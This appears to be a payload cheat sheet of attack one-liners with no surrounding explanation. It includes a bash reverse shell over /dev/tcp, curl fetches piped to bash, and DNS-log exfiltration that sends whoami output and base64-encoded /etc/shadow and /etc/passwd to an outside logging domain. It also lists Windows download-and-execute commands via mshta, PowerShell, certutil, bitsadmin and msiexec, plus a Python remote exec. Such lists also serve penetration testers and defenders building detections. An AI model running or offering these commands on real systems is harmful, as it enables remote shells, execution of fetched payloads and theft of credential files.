bash -i >& /dev/tcp/127.0.0.1/6666 0>&1
curl -o /tmp/1.sh http://x.x.x.x/1.txt
chmod 777 /tmp/1.sh
ping `whoami`.key.dnslog.cn
curl http://www.google.com/bash.txt|bash
curl http://key.dnslog.cn/?r=`whoami`
curl http://key.dnslog.cn/?r=`cat /etc/shadow|base64`
curl http://key.dnslog.cn/?r=$(cat /etc/passwd|base64|tr '\n' '-')
curl http://www.google.com/key.txt
curl http://www.google.com/key.txt -O
curl http://www.google.com/key.txt -o key.txt
mshta http://127.0.0.1:80/download/file.ext
echo IEX(new-object net.webclient).downloadstring('[u]') | powershell -
powershell.exe -Command "Invoke-WebRequest -Uri [u] -OutFile x.exe"
certutil.exe -urlcache -split -f [u] x.exe
bitsadmin /rawreturn /transfer down "[u]" c:\\x.exe
msiexec /q /%os:~1,1% http://127.0.0.1:8080/x.exe
python -c "import urllib2; exec urllib2.urlopen('[u]').read();"